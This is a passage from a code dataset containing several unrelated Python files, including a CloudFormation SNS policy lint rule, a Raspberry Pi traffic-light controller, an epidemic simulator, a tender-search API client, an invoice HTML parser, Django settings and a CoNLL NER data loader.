inspect.currentframe().f_back.f_lineno))\n\n\nclass SnsTopicPolicyNotPrincipalRule(BaseRule):\n\n def __init__(self, cfn_model=None, debug=None):\n '''\n Initialize\n :param cfn_model:\n '''\n BaseRule.__init__(self, cfn_model, debug=debug)\n\n def rule_text(self):\n '''\n Get rule text\n :return:\n '''\n if self.debug:\n print('rule_text' + lineno())\n return 'SNS Topic policy should not allow Allow+NotPrincipal'\n\n def rule_type(self):\n '''\n Get rule type\n :return:\n '''\n self.type = 'VIOLATION::FAILING_VIOLATION'\n return 'VIOLATION::FAILING_VIOLATION'\n\n def rule_id(self):\n '''\n Get rule id\n :return:\n '''\n if self.debug:\n print('rule_id' + lineno())\n self.id = 'F8'\n return 'F8'\n\n def audit_impl(self):\n '''\n Audit\n :return: violations\n '''\n if self.debug:\n print('SnsTopicPolicyNotPrincipalRule - audit_impl' + lineno())\n\n violating_policies = []\n resources = self.cfn_model.resources_by_type('AWS::SNS::TopicPolicy')\n\n if len(resources) > 0:\n for resource in resources:\n if self.debug:\n print('resource: ' + str(resource) + lineno())\n print('vars: ' + str(vars(resource)) + lineno())\n\n if hasattr(resource, 'policy_document'):\n\n if resource.policy_document:\n\n if resource.policy_document.allows_not_principal():\n violating_policies.append(str(resource.logical_resource_id))\n elif hasattr(resource, 'policy'):\n\n if resource.policy_document:\n\n if resource.policy.allows_not_principal():\n violating_policies.append(str(resource.logical_resource_id))\n\n else:\n if self.debug:\n print('no violating_policies' + lineno())\n\n\n\n return violating_policies","sub_path":"terraform_validator/custom_rules/SnsTopicPolicyNotPrincipalRule.py","file_name":"SnsTopicPolicyNotPrincipalRule.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"46897006","text":"import RPi.GPIO as GPIO\nimport time\nimport sys\n\nRED = 22\nGREEN = 16\nYELLOW = 18\n\nSENSOR = 12\n\n\ndef all_leds_off():\n global RED, GREEN, YELLOW, SENSOR\n\n for pin in [RED, GREEN, YELLOW]:\n GPIO.output(pin, 0)\n\ndef signal_start():\n global RED, GREEN, YELLOW, SENSOR\n\n print(\"Starting signal\")\n all_leds_off()\n GPIO.output(GREEN, 1)\n\n\ndef signal_stop():\n global RED, GREEN, YELLOW, SENSOR\n\n print(\"Stopping signal\")\n all_leds_off()\n GPIO.output(YELLOW, 1)\n time.sleep(3)\n GPIO.output(YELLOW, 0)\n GPIO.output(RED, 1)\n\ndef setup():\n global RED, GREEN, YELLOW, SENSOR\n\n GPIO.cleanup()\n GPIO.setmode(GPIO.BOARD)\n\n GPIO.setup(RED, GPIO.OUT)\n GPIO.setup(GREEN, GPIO.OUT)\n GPIO.setup(YELLOW, GPIO.OUT)\n GPIO.setup(SENSOR, GPIO.IN)\n\nif '__main__' == __name__:\n \n \n setup()\n signal_stop()\n\n stopped = True\n\n while True:\n signal_status = GPIO.input(SENSOR)\n print(signal_status)\n if stopped and not signal_status:\n signal_start()\n stopped = False\n elif not stopped and signal_status:\n signal_stop()\n stopped = True\n \n time.sleep(0.5)\n","sub_path":"traffic_control.py","file_name":"traffic_control.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"263024726","text":"print(\"A Game of Hangman\")\n\n#random word generator\n\n#first method\n\nimport random\nlistA = [\"word1\", \"word2\", \"word3\"]\nMysteryWord = random.choice(listA)\nprint(MysteryWord)\n\n#second method\nstr='word1 word2 word3 word4'\nx=str.split()\ny=len(x)\nimport random\nz=random.randrange(-1,y)\nprint(x[z])\n\n\n#method 3\nprint(random.choice(\"word1 word2 word3 word4 word5 word6 word7\".split()))\n#less editing to do using this method and all in one line\n\n#use one of the above methods, but list is an import .txt file\n\nendseq = input(\"type exit to return to the index: \")\nif endseq == \"exit\":\n\texit()\nelse:\n\tprint(\"okay soooo....what now\")\n","sub_path":"sandboxes and beta/randomisation.py","file_name":"randomisation.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"69592916","text":"\"\"\"model change invites\n\nRevision ID: 534a8aa4ec83\nRevises: 070402407d93\nCreate Date: 2019-01-15 23:43:39.672053\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '534a8aa4ec83'\ndown_revision = '070402407d93'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('invites',\n sa.Column('ownerId', sa.Integer(), nullable=False),\n sa.Column('projectId', sa.Integer(), nullable=False),\n sa.Column('inviteeId', sa.Integer(), nullable=True),\n sa.Column('inviteStatus', sa.Boolean(), nullable=True),\n sa.Column('requestedTs', sa.DateTime(), nullable=True),\n sa.Column('responseTs', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['ownerId'], ['user.id'], ),\n sa.ForeignKeyConstraint(['projectId'], ['project.id'], ),\n sa.PrimaryKeyConstraint('ownerId', 'projectId')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('invites')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/534a8aa4ec83_model_change_invites.py","file_name":"534a8aa4ec83_model_change_invites.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"354829259","text":"import random\n\n# Defining classes-----------------------------------------------------------------------------------------------------------------------------------------\n# class Simulation\n# class Person\n# class Population\n\n\nclass Simulation():\n \"\"\"A class to control simulation\"\"\"\n\n def __init__(self):\n \"\"\"Initializing attributes\"\"\"\n self.day_number = 1\n self.population_size = int(\n input(\"To simulate an epidemic outbreak. Please enter the population size: \"))\n\n print(\"\\nFirst start by infecting a portion of the population.\")\n self.infection_percent = float(\n input(\"---Enter the percentage (0-100) of the population to initially infect: \"))\n self.infection_percent /= 100\n\n print(\"\\nKnowing the risk a person has to contract the disease when exposed.\")\n self.infection_probability = float(input(\n \"---Enter the probability (0-100) that a person gets infected when exposed to the disease: \"))\n\n print(\"\\nknowing how long the infection will last when exposed.\")\n self.infection_duration = int(\n input(\"---Enter the duration (in days) of the infection: \"))\n\n print(\"\\nknowing the mortality rate of those infected.\")\n self.mortality_rate = float(\n input(\"---Enter the mortality rate (0-100) of the infection: \"))\n\n print(\"\\nknowing how long to run the simulation.\")\n self.sim_days = int(input(\"---Enter the number of days to simulate: \"))\n\n\nclass Person():\n \"\"\"A class for the individual person\"\"\"\n\n def __init__(self):\n \"\"\"Initializing attributes\"\"\"\n self.is_infected = False\n self.is_dead = False\n self.days_infected = 0\n\n def infect(self, simulation):\n \"\"\"Infecting a person\"\"\"\n if random.randint(0, 100) < simulation.infection_probability:\n self.is_infected = True\n\n def heal(self):\n \"\"\"Heal a person\"\"\"\n self.is_infected = False\n self.days_infected = 0\n\n def die(self):\n \"\"\"Kill a person\"\"\"\n self.is_dead = True\n\n def update(self, simulation):\n \"\"\"update the simulation\"\"\"\n # check if a person is not dead.\n if not self.is_dead:\n # check if a person is infected\n if self.is_infected:\n self.days_infected += 1\n # check if a person will die or not\n if random.randint(0, 100) < simulation.mortality_rate:\n self.die()\n elif self.days_infected == simulation.infection_duration:\n self.heal()\n\n\nclass Population():\n \"\"\"A class to model a whole population of Person objects\"\"\"\n\n def __init__(self, simulation):\n \"\"\"Initializing attributes\"\"\"\n self.population = [] # list of all person instances\n\n for i in range(simulation.population_size): # loop through row\n person = Person()\n self.population.append(person)\n\n def initial_infection(self, Simulation):\n \"\"\"Infect an initial portion of the population based on initial conditions of the simulation\"\"\"\n infected_count = int(\n round(Simulation.infection_percent*Simulation.population_size, 0))\n\n for i in range(infected_count):\n self.population[i].is_infected = True\n self.population[i].days_infected = 1\n\n # shuffle the population to spred the infection\n random.shuffle(self.population)\n\n def spread_infection(self, simulation):\n \"\"\"Spreading the infection in list population\"\"\"\n for i in range(len(self.population)):\n if self.population[i].is_dead == False:\n # if a person is not dead\n if i == 0:\n # first person in list\n # check for right\n if self.population[i+1].is_infected:\n self.population[i].infect(simulation)\n elif i < len(self.population)-1:\n # middle person in list\n # check for right and left\n if self.population[i-1].is_infected or self.population[i+1].is_infected:\n self.population[i].infect(simulation)\n elif i == len(self.population)-1:\n # last person in a list\n # check for left\n if self.population[i-1].is_infected:\n self.population[i].infect(simulation)\n\n def update(self, simulation):\n \"\"\"Update the whole population by updating each individual Person\"\"\"\n simulation.day_number += 1\n for person in self.population:\n person.update(simulation)\n\n def display_statistics(self, simulation):\n \"\"\"display the statistics of populations\"\"\"\n total_infected_count = 0\n total_death_count = 0\n for person in self.population:\n # check if a person is infected or dead\n if person.is_infected:\n total_infected_count += 1\n if person.is_dead:\n total_death_count += 1\n\n # Calculate percentage of population that is infected and dead\n infected_percent = round(\n 100*(total_infected_count/simulation.population_size), 4)\n death_percent = round(\n 100*(total_death_count/simulation.population_size), 4)\n\n # Summery\n print(f\"\\n-----Day #{simulation.day_number} -----\")\n print(f\"Percentage of Population Infected: {infected_percent}%\")\n print(f\"Percentage of Population Dead: {death_percent}%\")\n print(\n f\"Total People Infected: {total_infected_count} / {simulation.population_size}\")\n print(\n f\"Total Deaths: {total_death_count} / {simulation. population_size}\")\n\n def graphics(self):\n \"\"\"Graphical representation: 0 is healthy,I is infected,X is dead\"\"\"\n status = []\n for person in self.population:\n # if person is dead\n if person.is_dead:\n char = \"X\"\n else:\n # person is alive\n # if he/she infected or healthy\n if person.is_infected:\n char = \"I\"\n else:\n char = \"0\"\n\n status.append(char)\n\n # print status separeted by -\n for letter in status:\n print(letter, end=\"-\")\n\n# Defining classes end-------------------------------------------------------------------------------------------------------------------------------------\n# Defining functions------------------------------------------------------------------------------------------------------------------------------------\n\n\ndef main():\n \"\"\"main code\"\"\"\n # Epidemic Outbreak Terminal Applicaton\n print(\"**\"*50)\n\n # Welcome message.\n print(\"Welcome To Epidemic Outbreak Terminal Applicaton.\")\n\n # simulation object\n sim = Simulation()\n\n # A Population object.\n pop = Population(sim)\n\n # initializing\n pop.initial_infection(sim)\n pop.display_statistics(sim)\n pop.graphics()\n input(\"Press 'Enter' to start simulation\")\n\n # Simulation\n for i in range(1, sim.sim_days):\n # Spread the infection\n pop.spread_infection(sim)\n # Update the population\n pop.update(sim)\n # Display the statistics\n pop.display_statistics(sim)\n pop.graphics()\n\n # If we are currently not on the last day of the simulation:\n if i != sim.sim_days-1:\n input(\"\\nPress 'Enter' to advance to the next day.\")\n\n # End of programm.\n print(\"\\n\\nThank you for using the Epidemic Outbreak Terminal Applicaton. Goodbye.\\n\")\n print(\"**\"*50)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"APPLICATIONS/8 Classes/39 Epidemic Outbreak Terminal Applicaton.py","file_name":"39 Epidemic Outbreak Terminal Applicaton.py","file_ext":"py","file_size_in_byte":7776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"354921836","text":"#!/usr/bin/env python\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport base64\nimport urllib.parse\nimport json\nimport argparse\nfrom datetime import date\nimport os\n\n\n#\n# CLI arguements Setup\n#\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--country', '-c', help = 'Set country code, two letters in caps, default is SE', type = str, default = \"SE\")\nparser.add_argument('--limit', '-l', help = 'Limit results to, default is 50', type = int, default = 20)\nparser.add_argument('--page', '-p', help = 'Limit results to, default is 50', type = int, default = 1)\nparser.add_argument('--search', '-t', help = 'Search string', type = str )\nparser.add_argument('--date', '-d', help = 'Date to search (YYYYMMDD or a span YYYYMMDD-YYYYMMDD)', type = str )\nparser.add_argument('--savexml', help = 'Save results as XML-files', type = str )\nparser.add_argument('--savejson', help = 'Save results as JSON-file', type = str )\nparser.add_argument('--json', help = 'Return as json', action='store_true' )\nparser.add_argument('--debug', help = 'Prints out debug information', action='store_true' )\n\n# Save all arguements here\nargs = parser.parse_args()\n\n\ndef fetchFromApi():\n\n # Start building a query\n qs = []\n\n # Set country parameter\n if args.country:\n qs.append(\"CY=[\" + str(args.country) +\"]\")\n\n # Set date parameter\n if args.date:\n date = args.date.split('-')\n if len(date) == 2:\n qs.append(\"PD=[\" + str(date[0]).strip() + \" <> \" + str(date[0]).strip() +\"]\")\n else:\n qs.append(\"PD=[\" + str(date[0]).strip() +\"]\")\n \n ## Set search string\n if args.search:\n searchList = []\n for w in args.search.split(\",\"):\n searchList.append('FT=[' + w + ']')\n search = \" AND \".join(searchList)\n qs.append('(' + search + ')' )\n\n # Parse query string\n apiQuery = urllib.parse.quote( \" AND \".join(qs) )\n debug(\" AND \".join(qs), 'query')\n\n # Generate request URI\n apiUrl = 'https://ted.europa.eu/api/v2.0/notices/search?fields=CONTENT&pageNum=%d&pageSize=%d&q=%s&reverseOrder=false&scope=2&sortField=ND' % (args.page, args.limit, apiQuery)\n debug(apiUrl, 'request url')\n\n # Get the response\n req = requests.get(apiUrl)\n req_json = req.json()\n debug(req_json, 'json response')\n\n # New dict to save results in\n results = {\n \"total\": req_json['total'],\n \"current_count\": len(req_json['results']),\n \"current_page\": args.page,\n \"results\": [],\n }\n\n # Loop over results\n for c in req_json['results']:\n results['results'].append( readContent( c['content'] ) )\n\n # Save to json file\n if args.savejson:\n # Get current dir, create and save output file\n filename = os.path.dirname(os.path.abspath(__file__)) + '/' + str(args.savejson)\n f = open(filename,\"w+\")\n f.write(json.dumps(results))\n f.close()\n\n # Output json\n if args.json:\n print( json.dumps(results) )\n \n # Print results\n else:\n print('-------------------------------------------------------------------')\n print('')\n print(' Showing '+ str(len(req_json['results'])) + ' of ' + str(req_json['total']) + ' found notices.')\n print('')\n print('-------------------------------------------------------------------')\n print('')\n print('')\n\n # Loop over results again.\n # TODO: Dry?\n for doc in results['results']:\n print(doc['name'] + ' / ' + doc['city'] + ' / ' + doc['docId'] )\n print(doc['title'])\n print(doc['desc'])\n print(doc['applyurl'])\n print('')\n print('-------------------------------------------------------------------')\n print('')\n\n\n\n\n\ndef readContent(content):\n # Base64 decode to xml string\n xml = base64.b64decode(content)\n\n # Parse with BeautifulSoup\n doc = BeautifulSoup(xml, \"xml\")\n\n # Extract the data we want here\n ted = extractJSON(doc)\n\n\n if args.savexml:\n # Get current dir, create output dir and save file\n path = os.path.dirname(os.path.abspath(__file__)) + '/' + str(args.savexml)\n os.makedirs(path, exist_ok=True)\n filename = path + '/' + ted['docId'] + '.xml'\n f = open(filename,\"w+\")\n f.write(doc.prettify())\n f.close()\n\n return ted\n\n\ndef extractJSON(doc):\n ted = {}\n \n # Find ORG information\n org_details = doc.find('CONTRACTING_BODY')\n if org_details:\n ted['org_details'] = {\n \"name\": findOrFalse( org_details.find('OFFICIALNAME') ),\n \"city\": findOrFalse( org_details.find('TOWN') ),\n \"street\": findOrFalse( org_details.find('ADDRESS') ),\n \"contact_name\": findOrFalse( org_details.find('CONTACT_POINT') ),\n \"contact_email\": findOrFalse( org_details.find('E_MAIL') ),\n \"url\": findOrFalse( org_details.find('URL_GENERAL') ) or findOrFalse( doc.find('NOTICE_DATA').find('IA_URL_GENERAL'))\n }\n \n # ted['primary_cpv'] = ''\n ted['cpv'] = {}\n for cpv in doc.find_all('ORIGINAL_CPV'):\n ted['cpv'][cpv['CODE']] = cpv.get_text()\n\n ted['nuts'] = findOrFalse( doc.find('NUTS'), 'CODE' ) or \"\"\n ted['city'] = findOrFalse( doc.find('TOWN') ) or \"\"\n ted['title'] = findOrFalse( doc.find('TITLE') ) or \"\"\n ted['desc'] = findOrFalse( doc.find('SHORT_DESCR') ) or \"\"\n ted['docId'] = findOrFalse( doc.find('TED_EXPORT'), 'DOC_ID' ) or \"\" \n ted['date_expires'] = findOrFalse( doc.find('DELETION_DATE') ) or \"\" \n ted['date_submitby'] = findOrFalse( doc.find('DATE_RECEIPT_TENDERS') ) or \"\" \n ted['applyurl'] = findOrFalse( doc.find('URL_DOCUMENT') ) or \"\"\n\n # Because chaining find() can cause errors\n contracting_body = doc.find('CONTRACTING_BODY')\n if contracting_body: \n ted['name'] = findOrFalse( contracting_body.find('OFFICIALNAME') ) or \"\"\n else:\n ted['name'] = \"\"\n\n # Because chaining find() can cause errors\n coded_data_section = doc.find('CODED_DATA_SECTION')\n if coded_data_section: \n ted['date_added'] = findOrFalse( coded_data_section.find('DATE_PUB') ) or \"\"\n else:\n ted['date_added'] = \"\"\n\n return ted\n\ndef findOrFalse(el, attr = False):\n if el and attr == False:\n return el.get_text().strip()\n elif el and attr:\n return el[attr]\n else:\n return False\n\ndef debug(data, flag = \"\"):\n if args.debug:\n print( '[' + flag + ']' )\n print( repr(data) )\n print( '[/' + flag + ']' )\n\nfetchFromApi()","sub_path":"ted.py","file_name":"ted.py","file_ext":"py","file_size_in_byte":6654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"449092128","text":"class Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n res = [[]]\n self.dfs(nums, 0, [], res)\n return res\n \n def dfs(self, nums, start, cur, res):\n if start >= len(nums):\n return\n else:\n for i in range(start, len(nums)):\n cur.append(nums[i])\n res.append(cur[:])\n self.dfs(nums, i + 1, cur, res)\n cur.pop()\n\nclass Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n subsets = [[]]\n for num in nums:\n for i in range(len(subsets)):\n subsets.append(subsets[i] + [num])\n return subsets \n\nclass Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n res = []\n self.dfs(nums, [], 0, res)\n return res\n \n def dfs(self, nums, cur, index, res):\n if index == len(nums):\n res.append(cur[:])\n else:\n self.dfs(nums, cur, index + 1, res)\n \n cur.append(nums[index])\n self.dfs(nums, cur, index + 1, res)\n cur.pop()\n\n","sub_path":"leetcode-questions/Tree/DFS&Backtracking/78_subsets.py","file_name":"78_subsets.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"541297613","text":"# encoding:utf-8\nimport json\nimport re\nfrom collections import OrderedDict\n\nimport os\nfrom bs4 import BeautifulSoup\n\n\ndef parse_source_code(source_html, invoice_id):\n soup = BeautifulSoup(source_html, 'lxml')\n\n fp_dict = OrderedDict()\n\n fp_dict['发票代码'] = soup.find('span', attrs={'id': re.compile('fpdm_(\\w+)')}).get_text()\n fp_dict['发票号码'] = soup.find('span', attrs={'id': re.compile('fphm_(\\w+)')}).get_text()\n fp_dict['开票日期'] = soup.find('span', attrs={'id': re.compile('kprq_(\\w+)')}).get_text()\n fp_dict['校验码'] = soup.find('span', attrs={'id': re.compile('jym_(\\w+)')}).get_text()\n fp_dict['机器编号'] = soup.find('span', attrs={'id': re.compile('[(sb)|(jq)]bh_(\\w+)')}).get_text()\n\n fp_dict['购买方名称'] = soup.find('span', attrs={'id': re.compile('gfmc_(\\w+)')}).get_text()\n fp_dict['购买方纳税人识别号'] = soup.find('span', attrs={'id': re.compile('gfsbh_(\\w+)')}).get_text()\n fp_dict['购买方地址、电话'] = soup.find('span', attrs={'id': re.compile('gfdzdh_(\\w+)')}).get_text()\n fp_dict['购买方开户行及账号'] = soup.find('span', attrs={'id': re.compile('gfyhzh_(\\w+)')}).get_text()\n\n fpmx_dict = OrderedDict()\n fpmx_items = []\n\n mx_table = soup.find('button', id='showmx')\n if mx_table:\n mx_row = soup.find('div', attrs={'id': 'print_areamx'}).find('table', class_='fppy_table').find_all('tr')\n else:\n mx_row = soup.find('table', attrs={'class': 'fppy_table_box'}).find_all('tr')\n\n for idx, row in enumerate(mx_row[1:]):\n temp_item = OrderedDict()\n\n if row.find('td').get_text().strip() == '合计' or row.find('td').get_text().strip() == '小计':\n break\n\n line_item = row.find_all('td')\n item_cnt = len(line_item)\n\n temp_item['序号'] = str(idx + 1)\n temp_item['货物或应税劳务、服务名称'] = line_item[item_cnt-8].get_text()\n temp_item['规格型号'] = line_item[item_cnt-7].get_text()\n temp_item['单位'] = line_item[item_cnt-6].get_text()\n temp_item['数量'] = line_item[item_cnt-5].get_text()\n temp_item['单价'] = line_item[item_cnt-4].get_text()\n temp_item['金额'] = line_item[item_cnt-3].get_text()\n temp_item['税率'] = line_item[item_cnt-2].get_text()\n temp_item['税额'] = line_item[item_cnt-1].get_text()\n fpmx_items.append(temp_item)\n fpmx_dict['项目'] = fpmx_items\n fpmx_dict['合计金额'] = soup.find('span', id=re.compile('je_(\\w+)')).get_text()\n fpmx_dict['合计税额'] = soup.find('span', id=re.compile('se_(\\w+)')).get_text()\n fpmx_dict['合计税额'] = soup.find('span', id=re.compile('se_(\\w+)')).get_text()\n fpmx_dict['价税合计(大写)'] = soup.find('span', id=re.compile('jshjdx_(\\w+)')).get_text()\n fpmx_dict['价税合计(小写)'] = soup.find('span', id=re.compile('jshjxx_(\\w+)')).get_text()\n\n fp_dict['明细'] = fpmx_dict\n\n fp_dict['销售方名称'] = soup.find('span', attrs={'id': re.compile('xfmc_(\\w+)')}).get_text()\n fp_dict['销售方纳税人识别号'] = soup.find('span', attrs={'id': re.compile('xfsbh_(\\w+)')}).get_text()\n fp_dict['销售方地址、电话'] = soup.find('span', attrs={'id': re.compile('xfdzdh_(\\w+)')}).get_text()\n fp_dict['销售方开户行及账号'] = soup.find('span', attrs={'id': re.compile('xfyhzh_(\\w+)')}).get_text()\n\n fp_dict['备注'] = soup.find('td', attrs={'id': re.compile('bz_(\\w+)')}).get_text().replace('\\n', '').strip()\n\n if 'display: none' in soup.find('div', attrs={'id': 'icon_zf'})['style']:\n fp_dict['发票状态'] = '正常'\n else:\n fp_dict['发票状态'] = '作废'\n\n json_text = json.dumps(fp_dict, ensure_ascii=False)\n\n with open(os.path.join('temp', '%s.json' % invoice_id), 'w', encoding='utf-8') as f:\n f.write(json_text)\n\n\nif __name__ == '__main__':\n with open('24695838.html', 'r') as f:\n parse_source_code(f.read(), '24695838')\n","sub_path":"invoice-validation/sourceparser.py","file_name":"sourceparser.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"564900426","text":"\"\"\"\nDjango settings for mysite3 project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nfrom mysite3.base import *\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.environ['SECRET_KEY']\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = not True\n\nTEMPLATE_DEBUG = DEBUG\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'mysite3_db',\n 'USER': 'mysite3_user',\n 'PASSWORD': 'mysite3_pass',\n 'HOST': 'localhost',\n }\n}\n\nSESSION_COOKIE_SECURE = True\n\nAUTHENTICATION_BACKENDS = (\n 'social.backends.google.GoogleOAuth2',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'social.apps.django_app.context_processors.backends',\n 'social.apps.django_app.context_processors.login_redirect',\n)\n\nSOCIAL_AUTH_GOOGLE_OAUTH2_KEY = os.environ['SOCIAL_AUTH_GOOGLE_OAUTH2_KEY']\nSOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = os.environ[\n 'SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET'\n]\n\nTEST_RUNNER = None\nNOSE_ARGS = None\n","sub_path":"mysite3/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"397165123","text":"# Copyright 2018 The Texar Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Utilities for preprocessing and iterating over the CoNLL 2003 data.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n# pylint: disable=invalid-name, too-many-locals\nimport sys\nfrom collections import defaultdict\nimport numpy as np\n\n\nimport re\nMAX_CHAR_LENGTH = 45\nNUM_CHAR_PAD = 2\n\nUNK_WORD, UNK_CHAR, UNK_NER = 0, 0, 0\nPAD_WORD, PAD_CHAR, PAD_NER = 1, 1, 1\n\n\n# Regular expressions used to normalize digits.\nDIGIT_RE = re.compile(br\"\\d\")\n\ndef create_vocabs(train_path, normalize_digits=True):\n\n word_vocab = defaultdict(lambda: len(word_vocab))\n char_vocab = defaultdict(lambda: len(char_vocab))\n ner_vocab = defaultdict(lambda: len(ner_vocab))\n\n UNK_WORD = word_vocab[\"\"]\n PAD_WORD = word_vocab[\"\"]\n UNK_CHAR = char_vocab[\"\"]\n PAD_CHAR = char_vocab[\"\"]\n UNK_NER = ner_vocab[\"\"]\n PAD_NER = ner_vocab[\"\"]\n\n\n print(\"Creating Vocabularies:\")\n\n with open(train_path, 'r') as file:\n for line in file:\n if sys.version[0] =='2':\n line = line.decode('utf-8')\n line = line.strip()\n if len(line) == 0:\n continue\n\n tokens = line.split(' ')\n for char in tokens[1]:\n cid = char_vocab[char]\n\n word = DIGIT_RE.sub(b\"0\", tokens[1]) if normalize_digits else tokens[1]\n ner = tokens[4]\n\n wid = word_vocab[word]\n nid = ner_vocab[ner]\n\n\n print(\"Total Vocabulary Size: %d\" % len(word_vocab))\n print(\"Character Alphabet Size: %d\" % len(char_vocab))\n print(\"NER Alphabet Size: %d\" % len(ner_vocab))\n\n word_vocab = defaultdict(lambda: UNK_WORD, word_vocab)\n char_vocab = defaultdict(lambda: UNK_CHAR, char_vocab)\n ner_vocab = defaultdict(lambda: UNK_NER, ner_vocab)\n\n i2w = {v: k for k, v in word_vocab.items()}\n i2n = {v: k for k, v in ner_vocab.items()}\n return (word_vocab, char_vocab, ner_vocab), (i2w, i2n)\n\n\ndef read_data(source_path, word_vocab, char_vocab, ner_vocab, normalize_digits=True):\n data = []\n print('Reading data from %s' % source_path)\n counter = 0\n reader = CoNLLReader(source_path, word_vocab, char_vocab, ner_vocab)\n inst = reader.getNext(normalize_digits)\n while inst is not None:\n counter += 1\n sent = inst.sentence\n data.append([sent.word_ids, sent.char_id_seqs, inst.ner_ids])\n inst = reader.getNext(normalize_digits)\n\n reader.close()\n print(\"Total number of data: %d\" % counter)\n return data\n\n\ndef iterate_batch(data, batch_size, shuffle=False):\n if shuffle:\n np.random.shuffle(data)\n\n for start_idx in range(0, len(data), batch_size):\n excerpt = slice(start_idx, start_idx + batch_size)\n batch = data[excerpt]\n\n batch_length = max([len(batch[i][0]) for i in range(len(batch))])\n\n wid_inputs = np.empty([len(batch), batch_length], dtype=np.int64)\n cid_inputs = np.empty([len(batch), batch_length, MAX_CHAR_LENGTH], dtype=np.int64)\n nid_inputs = np.empty([len(batch), batch_length], dtype=np.int64)\n masks = np.zeros([len(batch), batch_length], dtype=np.float32)\n lengths = np.empty(len(batch), dtype=np.int64)\n\n for i, inst in enumerate(batch):\n wids, cid_seqs, nids = inst\n\n inst_size = len(wids)\n lengths[i] = inst_size\n # word ids\n wid_inputs[i, :inst_size] = wids\n wid_inputs[i, inst_size:] = PAD_WORD\n for c, cids in enumerate(cid_seqs):\n cid_inputs[i, c, :len(cids)] = cids\n cid_inputs[i, c, len(cids):] = PAD_CHAR\n cid_inputs[i, inst_size:, :] = PAD_CHAR\n nid_inputs[i, :inst_size] = nids\n nid_inputs[i, inst_size:] = PAD_NER\n masks[i, :inst_size] = 1.0\n\n yield wid_inputs, cid_inputs, nid_inputs, masks, lengths\n\n\nclass CoNLLReader(object):\n def __init__(self, file_path, word_vocab, char_vocab, ner_vocab):\n self.__source_file = open(file_path, 'r')\n self.__word_vocab = word_vocab\n self.__char_vocab = char_vocab\n self.__ner_vocab = ner_vocab\n\n def close(self):\n self.__source_file.close()\n\n def getNext(self, normalize_digits=True):\n line = self.__source_file.readline()\n # skip multiple blank lines.\n while len(line) > 0 and len(line.strip()) == 0:\n line = self.__source_file.readline()\n if len(line) == 0:\n return None\n\n lines = []\n while len(line.strip()) > 0:\n line = line.strip()\n line = line.decode('utf-8')\n lines.append(line.split(' '))\n line = self.__source_file.readline()\n\n length = len(lines)\n if length == 0:\n return None\n\n words = []\n word_ids = []\n char_seqs = []\n char_id_seqs = []\n ner_tags = []\n ner_ids = []\n\n for tokens in lines:\n chars = []\n char_ids = []\n for char in tokens[1]:\n chars.append(char)\n char_ids.append(self.__char_vocab[char])\n if len(chars) > MAX_CHAR_LENGTH:\n chars = chars[:MAX_CHAR_LENGTH]\n char_ids = char_ids[:MAX_CHAR_LENGTH]\n char_seqs.append(chars)\n char_id_seqs.append(char_ids)\n\n word = DIGIT_RE.sub(b\"0\", tokens[1]) if normalize_digits else tokens[1]\n ner = tokens[4]\n\n words.append(word)\n word_ids.append(self.__word_vocab[word])\n\n ner_tags.append(ner)\n ner_ids.append(self.__ner_vocab[ner])\n\n return NERInstance(Sentence(words, 